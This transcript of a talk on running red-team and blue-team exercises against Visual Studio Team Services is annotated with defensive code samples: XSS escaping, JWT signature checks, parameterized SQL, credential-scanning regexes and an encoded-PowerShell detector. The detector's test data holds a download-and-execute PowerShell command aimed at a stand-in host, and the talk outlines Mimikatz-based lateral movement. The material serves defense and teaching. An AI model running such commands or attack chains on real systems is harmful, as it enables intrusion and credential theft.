Thanks for joining me. So I'm going to talk about security today. I'm Buck Hodges, director of engineering for Visual Studio Team Services, and a lot of security talk can be very dry, very boring. I want to change that. So we'll start with: what does a security conversation normally look like? Because one of the biggest challenges, and this is sort of my whole crux here, the biggest challenge with security isn't actually doing it so much as it is convincing people to go do it. And so this is the problem we're going to talk about today. So how many of you have been involved in these kinds of conversations? Well, how real is that threat? Our team is good, right? I don't think that's possible. We've never been breached. Can't be a problem, right? Endless debate about value. Should I go invest in security? Should I work on features? I should ship more features, right? So how do we deal with that conversation? How do we change the game there? And so my whole talk here is about shifting the conversation from a debate about the value of security to a concrete conversation about where to invest and how. So we'll start here with this quote from Michael Hayden, who was former director of the NSA and CIA. And he says: fundamentally, if somebody wants to get in, they're getting in. Accept that. What we tell clients is, number one, you're in the fight whether you thought you were or not. Number two, you're almost certainly penetrated. And this is a pretty stark statement: you're going to get breached. What are you going to do about it? So to start with, there's a mindset shift. There are sort of two things here, right? There's preventing a breach and there's assuming a breach will happen. Prevent breach has threat modeling in it, code review, kind of all the things that you've heard about and know you should do. And they're very valuable. They're very valuable activities.
At the same time, they're not enough, because the thing with an attacker is an attacker only has to get a few things right to get in. You have to get everything right to keep them out. It's a very asymmetric balance in the equation there. So the mindset of assuming breach is really about thinking, all right, if it's going to happen, am I prepared? How do I deal with that? How do I detect that I'm being attacked? How do I handle it if something does happen? What's my response plan? What am I going to do when it happens? How do I recover? All these questions that, you know, if I don't have some means of dealing with them, become real panic in an emergency. Part of this too is ongoing live site testing of your response mechanisms. So let's say you've done some security work. Today you've got alerting on, hey, when something happens, this alert's supposed to fire. These people are supposed to do something. We have that too. We started testing this. We'd go do stuff that would trigger alerts. Three days later, we'd get an email. Huh, that didn't work too well, did it? Right? So do you really know whether or not your detection mechanisms are actually going to help you? Are they going to respond fast enough? And then when you think about attacks, once the attacker gets in, what do they have access to? Security is something where it's all about layers. And people often think, hey, if I'm on my corporate network, if I'm inside my firewall, I'm safe. And that becomes an attacker's greatest dream, because once they get through your first layer of defense, everything else is just awesome, right? How many internal websites have you seen that have major security flaws because everyone assumed, hey, this is safe, I'm inside the corporate firewall, I don't think too hard about it?
And then as part of this, once you run these exercises (and we're going to talk about running breach exercises here), you need to think about your assessment afterwards. How do you react afterwards? What do you do? So the first thing is the shift in mindset. Many people, us included, right? I spent this whole time talking about TFS, the on-prem product, and then we moved to the cloud. When you're on prem, you've got a server, you've got domain admins, you've got private IP addresses, you're not exposed to the internet. Then you start running services and it all shifts, right? You go from thinking about domains to thinking about subscriptions. Who's got access to your subscription? How do you manage those secrets? You've got a bunch of IP addresses for endpoints for your various services that are online. How do you deal with that? And this is where we do something internally, and a lot of other companies do as well, called red versus blue: red teams and blue teams. And this is key to changing the whole conversation around security. So what is red versus blue? Red versus blue literally means you spin up a red team that goes and attacks your service, and you have a blue team whose whole goal is to detect and thwart the attackers. And forming a red team, we'll talk a little bit about what that looks like. But it's really about taking either external people or internal people. And quite honestly, I think, certainly early on, the ideal combination is to have both: pair external penetration testers with people on your team. Because the most interesting attacks require knowledge of your service. You know, people can run scan tools, and those are valuable. They'll find things like, let's say, a deserialization vulnerability or something. All good stuff. You go fix it. But the most interesting attacks string together multiple issues. And those are best identified by people who are deep into the system, who really understand it well.
So red versus blue: you have an actual event where you've got a set of people who will go attack your system. And that could be a week, it could be months; there are any number of ways you can structure it. Typically, we do a few days to a week for an event. And the blue team, meanwhile, is trying to figure out what's happening. They're monitoring. Now, early on when we started, we really had a blue team spun up to go look at the system while the red team was attacking. But how often do attackers warn you ahead of time and say, hey, get ready? They don't. Now, early on, when we started this, we were so bad at it that we could tell the blue team what was happening. It didn't really matter. They were screwed. So early on, blue team is a character-building exercise. It's really starting to think about, okay, the red team did something. So often, early on, you find out later what they did by doing the forensics, and then you ask yourself: they did these things. Can we tell what they did? Do we understand what impact they really had? How do we detect them? And it takes years, and I'll show you the progression, but it took a long time. Now, I love these things. I love security. I love red team events. They're so fascinating, because the creativity that people will apply to break into services has no limit. It's fantastic. And it's also a mindset: these are people who don't see rules. So often engineers and developers, when they write a piece of code, think about how it should work. The attacker thinks about everything but the right way for it to work, right? So when you run these events, and they run across Microsoft, this is not at all unique to us, I always require proof. I want to see: can you prove to me that you got in? And we'll talk about the rules of engagement in a minute, but this is MSNJ. What do you notice is happening here?
I go to the main dashboard and it rotates upside down. Again, I want proof, and I want to change the conversation. I can come talk to you about what might be possible, but if I show you something like that, if you click on your homepage and it rotates on you, I've got your attention, right? So the red teams are also very clever. Again, they're creative people. They had exploited this particular vulnerability, which happened to be a cross-site scripting vulnerability, and they wired it up so that every time somebody viewed the MSNJ dashboard, it voted on the work item to go fix this vulnerability. It had 280 votes to go fix this vulnerability. Somewhere in VSTS there was a persistent cross-site scripting vulnerability. It was really, really clever. But I demand proof. Don't tell me what you might have been able to do. Show me what you did. So here's kind of the evolution of red versus blue for us. Before we started it, we did a variety of things to try to improve security. And it's not that we were doing a bad job. It's just you can always get better. And this is one of the things that in my mind has really shifted and improved our security posture more than anything else we've done. But we would identify, and we still do, vulnerabilities through manual code review. It's a good exercise. We had engaged an external pen testing company, and they came and they did stuff and they gave us a report, and there were a few things in there to go fix, and it was interesting, but it wasn't super interesting. There's only so much you're going to get out of scans, and there are a variety of tools that you can either purchase as services or buy outright to use for scanning. They're valuable. You should do it. But it's really just getting started. That's not the interesting stuff in a lot of cases. It's just kind of the basics. So we engaged the external pen testing company.
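That dashboard stunt is what a persistent (stored) cross-site scripting bug makes possible: whatever script an attacker manages to store runs in every viewer's browser. Here's a minimal sketch of the bug class and the standard fix; the function names and the vote-casting payload are hypothetical illustrations, not VSTS code.

```python
import html

def render_comment_unsafe(comment: str) -> str:
    # Vulnerable: user input is interpolated straight into the page,
    # so a stored <script> payload executes for every viewer.
    return f"<div class='comment'>{comment}</div>"

def render_comment_safe(comment: str) -> str:
    # Escaping turns markup characters into inert HTML entities.
    return f"<div class='comment'>{html.escape(comment)}</div>"

# Hypothetical payload in the spirit of the red team's dashboard trick.
payload = "<script>voteOnWorkItem(280)</script>"
unsafe = render_comment_unsafe(payload)  # script tag survives intact
safe = render_comment_safe(payload)      # rendered as harmless text
```

The point is that the safe version has to be the default path; one template that forgets to escape is enough for a persistent XSS.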
We would also do report-outs to the team, and this, by the way, is really key. And we do this all the time now. We in fact did our latest red team report a couple of weeks ago. When you go have the conversation with the team, you show them what you've broken in their code. So if I come to you and I say, hey, here's this interesting vulnerability in, I don't know, Internet Explorer or whatever, you go, ha, those guys are stupid. I can't believe they did that. That would never happen to me, right? It's very easy as a human to dismiss it, because your ego is saying, yeah, it wouldn't happen to me. But when I come to you and I present, I broke your code, here's how I got into your code, it changes your mindset. And the result of these red team events has been that people will actually make statements. I love it every time I hear one in the hallway: yeah, I don't want to show up in the next red team event, right? I don't want my code being there. Some of you are probably familiar with threat modeling. It's in the presentation. I won't get to it today, but you can look at it in the slides. Threat modeling is a great exercise, but you tend to only do it when you design new features. Everybody knows, of course, you can introduce a massive vulnerability with a single line of code change. It happened to us years and years ago. Somebody modified a code path where we evaluate the tokens, the JWTs, the JSON Web Tokens, that we use for authentication. They thought they were modifying a code path that was only used in testing. They took out the signature validation. Turns out they took it out for everything. That was terrible. It was a one-line change. Change a Boolean variable and introduce a massive vulnerability. So I want people to think about security all the time. Every time they write a line of code, I want that in their heads.
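That one-line failure mode is easy to see in a sketch. This is not the VSTS token code; it's a minimal HS256-style validator built on the standard library, with the dangerous Boolean made explicit so you can see how one flipped flag disables all signature checking.

```python
import base64
import hashlib
import hmac
import json

def b64url(data: bytes) -> bytes:
    # JWT-style base64url without padding.
    return base64.urlsafe_b64encode(data).rstrip(b"=")

def sign(payload: dict, key: bytes) -> str:
    header = b64url(json.dumps({"alg": "HS256", "typ": "JWT"}).encode())
    body = b64url(json.dumps(payload).encode())
    sig = b64url(hmac.new(key, header + b"." + body, hashlib.sha256).digest())
    return b".".join([header, body, sig]).decode()

def validate(token: str, key: bytes, verify_signature: bool = True) -> dict:
    header, body, sig = token.split(".")
    # Flipping this one Boolean is the whole vulnerability: anyone can
    # then forge a token with any claims they like.
    if verify_signature:
        expected = b64url(hmac.new(key, f"{header}.{body}".encode(),
                                   hashlib.sha256).digest()).decode()
        if not hmac.compare_digest(sig, expected):
            raise ValueError("bad signature")
    return json.loads(base64.urlsafe_b64decode(body + "=" * (-len(body) % 4)))
```

With `verify_signature=True` a tampered body is rejected; with it `False`, a forged payload sails straight through.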
I can't mandate doing threat models or any other big process around changing a single line of code. We'd never get anything done. But if I've got it in your head, then you're going to do a better job inherently than if it's not on your mind. Part of those earlier exercises helped us identify the people who think creatively. One of the coolest things that happened, by the way, in the pre-red-team days: one of our engineers decided, hey, I think I can make use of the fact that .NET and SQL treat strings differently. The weighting of, say, a particular Cyrillic character in string comparisons, if you haven't set up your parameters correctly, is different between .NET and SQL. He was able to take that small little fact and demonstrate it: he wrote a PowerShell script, and he could go from being a guest, just a regular user in an account, to a deployment admin by exploiting that vulnerability. And this was four or five years ago now. But it's that level of creative thinking about just, what are the differences? How do I exploit that? So there were a few people on the team who had this kind of mindset, who like to break things, and those are the people that you want to find in your company and pair up with external pen testers, who will bring into your team knowledge of how to go about pen testing, be it tools, be it processes, be it mindset. You can really cross-pollinate between the people who understand and know how to do pen testing in general and the people on your team who can think creatively but also deeply know your code. They know where the bodies are buried. They know the interesting stuff to go after. And then, as we started this in 2015, we hired a pen tester who was actually really good, came highly recommended.
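The exact collation details of that exploit aren't in the talk, but the bug class is two layers disagreeing on what counts as "the same string". Here's a simplified illustration of the class with hypothetical names, where case-folding stands in for the SQL collation weighting that treated two distinct characters as equal:

```python
# Two layers that disagree on string equality: the app compares exactly
# (like a .NET ordinal comparison), while the database folds characters
# together (like a typical case/accent-insensitive SQL Server collation).
# The gap between the two is what the exploit lived in.

users = {"admin": {"role": "deployment_admin"}}  # hypothetical user store

def app_is_taken(name: str) -> bool:
    # App-layer uniqueness check: exact comparison.
    return name in users

def db_lookup(name: str):
    # DB-layer lookup: the collation folds case, so "Admin" finds "admin".
    for existing, row in users.items():
        if existing.lower() == name.lower():
            return row
    return None

attacker_name = "Admin"            # a brand-new name to the app layer...
assert not app_is_taken(attacker_name)
row = db_lookup(attacker_name)     # ...but the admin's row to the database
```

The fix is to make one layer authoritative for equality (matching parameter collations end to end), which is exactly the "set up your parameters correctly" point above.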
We paired up some ops-minded engineers to become the blue team, and this was early on, so we could warn the blue team, and like I say, unfortunately it didn't matter at the time. They couldn't find the red team. And the attacks start off with things that are just truly embarrassing, and I'll show you some of those, where secrets are poorly protected. How many people have ever put a secret on a file share, right? You think, oh man, I'll never do that, that's the stupidest thing ever. Every team at Microsoft that goes through and does red teaming, the red team goes and scans file shares, and they inevitably find secrets. So if you do it, you will find them in your company. They also found SQL injection. One of the SQL injection vulnerabilities they found over time was actually pretty cool. We go to great lengths to prevent SQL injection vulnerabilities. I talked in the architecture talk about having a SQL resource component layer that we use, where everything goes through. We use stored procs; we almost never build dynamic SQL. Almost. Well, there was that time when somebody got it wrong, and there were 38 characters that you could make use of for SQL injection. And the red team couldn't figure it out, so they went to the best SQL engineer on the team and said, we've got these 38 characters, can you come up with a way to do SQL injection? And he did. He figured out that he could use that to upload data into a temp table. And so, 38 characters at a time, he could write a new SQL string into a temp table. And at the time (we've changed this since), you could execute SQL straight out of a temp table. So after he uploaded it, he executed the SQL in the temp table, and boom, they owned us. And he actually could have done it in fewer characters; he didn't need all 38. But that's that level of creativity. They spotted a little bit of a hole, they found the right expert, and they figured it out.
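The general defense a layer like that enforces is parameterization: the driver binds the value, and user input is never parsed as SQL. A small `sqlite3` sketch of the difference (the table and payload are illustrative, not the VSTS schema):

```python
import sqlite3

conn = sqlite3.connect(":memory:")
conn.execute("CREATE TABLE users (name TEXT, is_admin INTEGER)")
conn.execute("INSERT INTO users VALUES ('alice', 1), ('bob', 0)")

def find_user_dynamic(name: str):
    # Vulnerable: user input is concatenated into the SQL string,
    # so the input can rewrite the query itself.
    return conn.execute(
        f"SELECT name FROM users WHERE name = '{name}'").fetchall()

def find_user_parameterized(name: str):
    # Safe: the driver binds the value; the input is only ever data.
    return conn.execute(
        "SELECT name FROM users WHERE name = ?", (name,)).fetchall()

payload = "x' OR '1'='1"
leaked = find_user_dynamic(payload)      # the classic tautology dumps every row
safe = find_user_parameterized(payload)  # matches no user named "x' OR '1'='1"
```

The 38-character story shows why "almost never" isn't "never": one dynamic-SQL path is all an attacker needs.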
So going through these exercises was really a major milestone for us, a real shift in how we approach security. We were actively going and finding problems and attacking our own service. We also started using phishing campaigns. We do tests, and I'll show you some results of that. Phishing is amazing. Like, okay, you find a zero day, you've got time to use it until somebody patches it. But there was somebody who was joking online, you know, teach a man to phish and he can get in forever. Phishing is just so phenomenally successful, and it changes what you have to do to protect yourself. And we'll talk a little bit about that later. So then in 2016, we further augmented the team with outside experts, meaning other red team members across the company. So Windows has a red team, Office 365 has a red team, Azure has a red team, IT has a red team. They're really good; they're very smart people. Anywhere you can start leveraging other people, you should do it. So we started borrowing, begging: hey, could we have one of your people for three days? And they were very nice; they would lend us somebody for three days. And what was interesting about that is we learned new techniques that way. Just like with the external folks, with the internal folks we also learned new ways to do things. They introduced us to new tools, new ways to think about things. And at that time, we were thinking about things like cross-site scripting, the engineering system itself, deserialization vulnerabilities, some really creative ones that involve some of the features in the product that I won't go into. But that was also the time when we started really thinking hard about, how do we stop losing? Like, the red team always wins. How do we change this equation? So we spent a lot of time thinking about logging, thinking about what else we could do for post-breach forensics. Because when they break in, do you really know what they did?
And in 2017, we've improved quite a bit. It now takes the red team a lot longer to get in. And you go, yeah, but you still lose. You're right, we still lose. Still sucks that way. But you can see a clear progression in the effort that it takes over the years. It's so much better now than it was then. You're never done with security. It's never perfect. But what's interesting is you look at all this, and I'll tell you about Calypso here in a minute, but this changed the equation. So when we did our first red team attack back in 2015, we found credentials on shares, some crazy stuff like that. And when Brian found out about it, Brian's head exploded. It's like, what? What kind of idiot does that? Let's fire those people. So it elicits a very strong response. And then, of course, he calms down and starts thinking about it. And then we talk about, okay, everybody kind of goes through this, etc. But at that point, I got his buy-in too. And he sees the value of it. The whole conversation around security is so often this trade-off of, do I invest in security or do I go do features? How do I balance this? And too often, people who worry about security come across as, oh, you're overly pessimistic, you worry about something that will never happen. It's never happened before. You know, all those questions I had on that first slide. Red versus blue really changes that whole conversation. It makes this very concrete, shows you what's possible. Calypso monitors are interesting because Calypso is a service that you can essentially think of today as a scheduler. It's basically running queries in Kusto, which is Azure Log Analytics. And it's running queries where you expect to get zero results. So I'll give you an example of one that we've created.
If you were able to remotely exploit a bug in anything, be it our code, be it Windows, be it whatever, let's say that as part of that exploit, you're going to run encoded PowerShell. It's a popular thing to do. Run encoded PowerShell so you get a foot in the door, and you've got basically a back door running at that point. Well, we have a Calypso alert so that if you attempt to run encoded PowerShell on the machine, we'll get an alert, it will actually show up as an incident, and we'll immediately engage. We didn't have that. I mean, there were events in 2015 and 2016 where people would find some clever way to get into a machine, and they'd put something on the machine, and we didn't detect it. And so we've come a long way in that detection. Calypso isn't something that we ship yet; it's something that we're actually talking to the Application Insights team about making a product, about pulling it in. I hope that happens, but at a minimum it's something that, if you wanted to, you could actually mimic yourselves, and hopefully it becomes part of the product over time. So part of this question always comes back to, well, has this been effective? What's been the outcome? After every one of these events, we go file a bunch of repair items. So just like you would do for live site, where you do an RCA and you file live site repair items, we have repair items for security. Over the course of the last three years, we filed 226 repair items, and we have an SLA around them. We require that these are fixed within two sprints. Now, if it's a vulnerability that you can actively exploit, obviously we go fix it immediately. So there's a whole spectrum here, right? But going back to defense in depth, when you look at the chain of how the red team got in, we'll fix the key ones immediately.
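A zero-result query like the encoded-PowerShell one can be mimicked with very little code. This sketch scans hypothetical process-creation log lines for `-EncodedCommand` and decodes the payload (PowerShell encodes it as Base64 of a UTF-16LE string); on a healthy fleet the query returns nothing, so any hit is an incident. The log lines and the URL in the sample command are invented for illustration.

```python
import base64
import re

# Hypothetical process-creation log (the kind of data you'd pull from
# security event logs); the second entry is constructed to be realistic.
cmd = "IEX (New-Object Net.WebClient).DownloadString('http://evil.example/p.ps1')"
encoded = base64.b64encode(cmd.encode("utf-16-le")).decode()
process_log = [
    "svchost.exe -k netsvcs",
    f"powershell.exe -NoProfile -EncodedCommand {encoded}",
]

ENCODED_PS = re.compile(
    r"powershell(?:\.exe)?\s.*-enc(?:odedcommand)?\s+([A-Za-z0-9+/=]+)",
    re.IGNORECASE)

def detect_encoded_powershell(lines):
    # Zero-result query: every hit gets surfaced as an incident,
    # with the payload decoded so responders can see the intent.
    hits = []
    for line in lines:
        m = ENCODED_PS.search(line)
        if m:
            b64 = m.group(1)
            b64 += "=" * (-len(b64) % 4)  # repair any stripped padding
            # -EncodedCommand payloads are Base64 of a UTF-16LE string.
            decoded = base64.b64decode(b64).decode("utf-16-le", "ignore")
            hits.append((line, decoded))
    return hits
```

In practice you'd run the equivalent query on a schedule against your log store, which is essentially what Calypso does.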
There are other things that could be used by somebody else, but by themselves you can't use them for anything. Those become work items that we then go follow up on. But we've generated a lot of interesting repair items as a result of these events. It's a crude metric, but it's a way of measuring their effectiveness. All right, so, guidelines. Now, if you're going to do red teaming, and I highly recommend it, I think, like I say, it changes the conversation. But you've got to be smart about it. So you've got to have some rules to the game here. And I like to have as few rules as possible, because real attackers don't play by the rules. They don't care what your rules are. But we run a business, and there are some things you can't do. So for example, we don't want the red team, or the blue team, but generally speaking the red team, to do any harm. Because we run a service. The last thing I'd want to have to do is apologize to you, our customers, and say, sorry, we took you down today because we were just running an internal event to see if we were secure. That's not good. Don't compromise anything more than you need to achieve your objective. They have to actually think about how they're compromising the service, because they often will collect credentials along the way. Like, if they break in and steal the connection string to a database, that's a valuable piece of data, right? So they have to protect the data that they collect as well. And that's a key part of the whole thing, making sure you don't do things like that. We also make it off limits to harass people. You know, you can't go do physical intimidation. You can't go steal somebody's badge. There are limits, to avoid problems. Rules of engagement: again, I don't want to take anybody down in these things. I don't want to access any customer data. Customer data is incredibly valuable to us. It's sacrosanct. You can't go mess with people's data. You can mess with our data.
And that's why I wrote external customer data. If you want to go mess with the data in MSNJ, you're able to do that. Now, I'd ask the red team, and I'd say, please don't take us down for a week, right? I've got to get stuff done. But if they want to go access data in MSNJ, have at it. It's our data. It's okay. But not external customer data. Make sure they don't weaken the protections. Like, they're going to find issues. They may even make changes along the way. But they have to think hard about making sure they don't actually leave the system more vulnerable than it already is. Again, don't do anything destructive that takes me a long time to recover from. And as they pick up these interesting and secret credentials, be careful how they store them. So what comes out of it? Two things. That backlog of repair items, the 226 that I showed you in the previous table, and that report, that readout to the entire organization. Those meetings are always very well attended. They're always interesting, because everybody wants to know what they broke into. They're just fantastic. So let's take an example. What does an unprotected share look like? Well, okay, in this case, it's the most extreme version. It's open to everyone, right? So what could go wrong there? Well, somebody created some share because it was convenient. And they put a file that looked like this there. And this really happened. This is not the actual file, but it's close enough so you get the idea. And those accounts, they're test accounts. Anything. Who cares? It's a test system. Nobody cares about a test system. Well, both our red team and other red teams in the company have found ways in this way: somebody writes a piece of code and they trust a test domain, or they trust some other service that doesn't have the same security level as production. And domain names are great for this, right?
So if you've got some test domain names, because anybody can control them, you go create a service running on your box under that domain name. If production trusts that, bad things start to happen. You might, say, exchange tokens for service principals or something. Those are very, very deadly things. Test accounts are something that look innocuous but are not. So they start looking for stuff, and they find credentials like this. And as I mentioned before, every team seems to experience this. And by the way, there have been incidents where non-test credentials, things that have access to certain things in production, have actually been found this way. It's bad. But it happens, and you've got to start somewhere. So the first thing to do, of course, is acknowledge that you have a problem. People have checked credentials into code. I've again picked a test example, but it's actually happened with production code. There are actually people who run scans on GitHub looking for keys for AWS and for Azure so they can go run their spam bots, so they can run Bitcoin miners, etc. The great thing about having a search feature in GitHub, by the way (they had to change this), is that you can use it to search for anything in your code, including credentials. They actually changed it to make it harder to use their search service to find them. But here we've got a key that's been embedded in code. What do we do about that? Well, one thing you can use, and this is currently internal, but the team that owns it is actually working on shipping it, so in the coming months this will become publicly available, is a tool called CredScan, or Credential Scanner, that will scan for patterns that resemble connection strings, passwords, etc. It's all based on regular expressions. They keep adding more and more regular expressions, so it's become very good.
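You can approximate the CredScan idea yourself with a handful of regular expressions. These patterns are simplified stand-ins, not the real rule set, which is far larger and regularly updated; the sample connection string is invented.

```python
import re

# Simplified stand-ins for CredScan-style rules: each rule is just a
# named regular expression run over every line of every file.
PATTERNS = {
    "connection string password": re.compile(r"(?i)\bpassword\s*=\s*[^;\s'\"]+"),
    "storage account key": re.compile(r"(?i)\baccountkey\s*=\s*[A-Za-z0-9+/]{40,}={0,2}"),
    "private key block": re.compile(r"-----BEGIN [A-Z ]*PRIVATE KEY-----"),
}

def scan_text(text, source="<memory>"):
    # Works the same on checked-in code or on files pulled off a share,
    # which is why the one tool covers both scenarios in the talk.
    hits = []
    for line_no, line in enumerate(text.splitlines(), 1):
        for rule, pattern in PATTERNS.items():
            if pattern.search(line):
                hits.append((source, line_no, rule))
    return hits

sample = "Server=tcp:db.example;User=sa;Password=Hunter2!\n"
findings = scan_text(sample, source="app.config")
```

False positives get suppressed by annotating the code, exactly as described below; the hit rate makes the noise worth it.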
And we've mandated across the company that you have to run this. So then there's another interesting challenge that this team is actually already dealing with now, which is: how do you get this inserted into all the build definitions, right? Because in order for it to run, it's got to be part of your build pipeline. You can also use the same tool, by the way, to scan shares, right? You feed it files off disk, great. It doesn't matter what the file is. It can be code, it can be files off a share. Very, very valuable for that too. And so it runs as part of the build, and I'll show you an output from that, and it uses these regular expressions to identify things. Now, there are going to be false positives, right? There are going to be hits that it discovers that aren't actually a problem. You can go annotate those in your code and say, no, no, no, this isn't real. But the hit rate is so good. It's extremely valuable. It's very much worth it. So here's an example of it showing up in the code. This same piece of test code got checked in, let's say. And this build, we call it the compliance CredScan build. And you can see here down at the bottom that it points out those errors. And this build is actually part of our PR. I think in Bill Estry's talk, he may have shown you a PR screenshot. In there was a run of CredScan. If CredScan fails, you cannot push your code. It's that important. Another piece that I mentioned here: you've got credentials on shares, you've got credentials kind of scattered in various places. How do you properly manage those? We have now moved everything over to Azure Key Vault. We used to use something that was an internal service; thankfully, there's now a public service. It works really well. We've moved entirely to it. Everybody else is moving to it as well.
And this is where we store passwords, keys, tokens, storage account keys, certificates, you know, you name it, whatever it is, we store it there. But we also store our test credentials there. Now, there's a different access level. If you want to get to production, right, me, I can't go get the production secrets. I literally don't have permission to the production secrets for VSTS. That's a good thing. If you steal my identity, I don't want you to be able to use me to get there. But test credentials, lots of people are going to have access to those. That's the nature of the beast, right? You've got to be able to run tests. But since they're in Key Vault, A, we know exactly what they are, B, we know where they are, and C, when we go to rotate them, it's easy to figure out how to change them. We can go to the source, we can change them in Key Vault, and the changes propagate immediately. So it's important to have everything in there. And you can define different vaults. We've got a whole hierarchy of vaults. In the case of the production service, we've got runtime vaults, deployment vaults, everything in there so that we can properly manage the secrets. And of course, with anything like this, some of them expire. You've got a certificate, let's say an SSL cert. It has an expiration. You want to make sure, of course, you renew it before it expires. So Key Vault helps manage all of this, and I highly recommend it. So let's go to another example of a red team attack. There's a way to list, you can see, of course, the administrators on your local machine. You can bring that up in Windows. Well, what could you do with this? What if you had a tool, and maybe some of you have heard of this tool, it's called Mimikatz. It's a great tool. If I'm admin on a box and I run Mimikatz, I get to steal your credentials. It was written by a French researcher.
It runs on all versions of Windows, with the exception that on Windows 10 Enterprise you can actually turn on Credential Guard to thwart it. Absent that, when you run it, it'll actually go extract credentials out of memory. And you just have to have debug privilege or the system account; you've got to be local admin. Fine. So what could you do with this? This seems like a great little tool. You know, if I get admin on somebody's machine, I can go steal their credentials. So here's an example of an attack. Start with an open file share. We find some plain text credentials. We find some developer box where those credentials are admin. I run Mimikatz. I now have those credentials. I now find the next computer that person has access to. And I keep repeating until I've collected as many credentials as I need to get to my ultimate objective, which of course is to get into production or whatever. But I can keep repeating this over and over again. So the next thing you want to know is, which machines can I get into? You're obviously not going to go right-click in Windows and list local administrators. That's way too painful. Turns out Windows helps you a lot. There's this thing called SAMR, the Security Account Manager Remote protocol, and you can use it to query who the local admins are. Now, the great news here, by the way, the punchline, is that they turned this off by default in the Windows 10 Anniversary Update. That was Redstone 1, which is great, because what happened is attackers would use that capability to go build an attack graph so that they can figure out how to get from one machine to the next to their ultimate destination. There's something you have and there's something you want, and if you can map out all the possibilities of getting from point A to point B, you can then figure out the most efficient way to get there.
So there's a tool out there, you can look it up on GitHub (I've got the link in the notes), called BloodHound, and it can take this data from Active Directory and SAMR and figure out who's got access to what machine. So as you find credentials, as you pick them up off file shares or wherever, or you run Mimikatz and steal them, you can ask: okay, I've got these credentials, where can I go with them? And of course, if you think about it in a holistic manner, you're really asking how to get to your destination in as few hops as possible. So it results in something like this. Let's say I've got my machine, and let's say I'm crazy enough to have the test account be admin on it. And this has happened in the past, not to me. So you get into my machine because you've stolen the test account credentials. It's a test account, seems harmless enough, right? But people would make it admin on their box because, at the time, it made it easier to run tests. So I go run Mimikatz, okay, not me, you, and you get my credentials. Then you go to the next machine, TESTSVR1. You sit on that, you run Mimikatz, you steal Alice's credentials. Alice, it turns out, has production access. Now I'm in business; I've got something I can really party with. You can also do this from the command line: you can list out the local admins on a machine, and this is exactly what SAMR allows you to do. But like I said, the good news is this got turned off by default in Windows 10 Anniversary Update. It's a group policy, so it can be re-enabled, and of course if you're not running Windows 10 at all, you're vulnerable. As I was talking through that, I alluded to one of the most important things, something that's key to the mindset shift here: defenders think in lists. This is from John Lambert, who's at the Microsoft Threat Intelligence Center, a very important security guy at the company.
We've just got so many acronyms, I can't remember all of them. So it says: defenders think in lists, attackers think in graphs, and as long as this is true, attackers win. Because at the end of the day, the attacker is just trying to achieve an objective, and how the attacker does it is irrelevant. They don't care how; they just want to find a way that gets them through. If you think, okay, I've got the following things, and you think in terms of what your code does and how it works, you're going to lose. You have to look at all the options. Here's an actual example. It's been a little redacted, but this is from a real attack the red team ran a while back, and they did exactly what we've just been talking about: they got credentials and hopped from machine to machine. They started up here on the left, they found the credentials to a test account, they found a dev box where it was admin, they then found a dual-homed machine that got them to some interesting boxes with access to production, and they won. They took over the service. The other thing to think about is that attackers have also changed their playbook. They're not necessarily looking to hit you with malware. Phishing attacks are one of the most effective ways to attack someone, and you see here, the second circle from the right says that of the recipients who open phishing messages, 11% click on attachments. So really, all I need to do is trick you into letting me in the door. How hard could this be? Or how easy could this be? So we run internal phishing attacks. I'm going to show you a couple that we did in our team, but they're done across the company, and there are actual companies (I forget the names) that you can hire to run phishing attacks on your own company, because you need telemetry on how effective it was, who clicked, and so forth. So here we ran a
phishing attack. This looks like a pretty stupid message; surely nobody would click on this, right? It says it came from a printer, and of course we all know these fancy internet-connected printers. Seems harmless enough; maybe you scanned something recently, so you decide to click on it. Well, 19 percent of people in our team decided to click on this. This was a few years ago, two and a half years ago, May of 2015. Ten people reported it, 2 percent. Not a great ratio, is it? Let's look at a better one. So we ran the same kind of attack again, the same time, May, two phishing attacks back to back. Back in May of 2015, Windows phones were a little more relevant than they are now, so this one was: hey, we're going to build this brand new Lumia for Windows 10, and you can get in on it. 220 people, 42 percent, clicked sign up. Thirty-seven people clicked on the last email I showed you, and on this one, only 11 people reported it to security. And the awesome thing here is that it says availability of the beta is extremely limited, this email must not be forwarded to others. Guess what happened: not only did people fall for it, they shared it with others. It's funny and it's sad, and if you watch the news, phishing is the best way to get into any company on the planet. So, going back to: what can I do if I've got somebody's credentials? Can they send email? Great, I can phish other people. What machines do they have access to? We've been through that example. Can they modify source code? Wait, I just stole a dev's credentials. I could go find the machine that has access to production, but why not just inject some code and put in a back door? If they've got a way to check in, they could do that. Can they modify the releases? Hmm, I could modify the release definition and have it run an arbitrary script. That could be interesting. Can they access the test
environment? As I was mentioning before, if production trusts anything that test owns, and test is of course not held to the same security standards as production, if anything in production trusts something less protected, less maintained from a security perspective, you may get owned. And then the credentials I stole, can they get into a production environment? That could be Azure resources, Azure subscriptions, storage accounts, any number of things. So, thinking about the blue team response: what does this look like from the blue team perspective? There are a variety of pieces here. We've got Azure Key Vault, and this includes the test credentials, for example. Getting all of those together into a single place is a huge improvement. This was a result of red team events: we realized just how poorly, at one point, we had managed credentials, and we fixed that. Remove local admins: every admin on a box is another opportunity for somebody to get in. Restrict SAMR: before it was off by default in Windows 10, we'd go around and turn it off on machines. You can do that in prior versions of Windows, and I'd highly recommend it. We actually put a check in the build process, at the PR. When you spin up your dev environment (I think this came up a little bit in an earlier talk), one of the things we check is: are you running Windows 10 Enterprise or Windows Server 2016, and do you have Credential Guard turned on? If not, we poke you to get you to do that. Now, one of the great things about most people having the same type of machine is that it becomes much easier to get people to turn it on. Pretty much every engineer, okay, literally every engineer, has an HP Z440 with six cores, so they're all the same, and it becomes much easier to get people to turn this on. But Credential Guard keeps
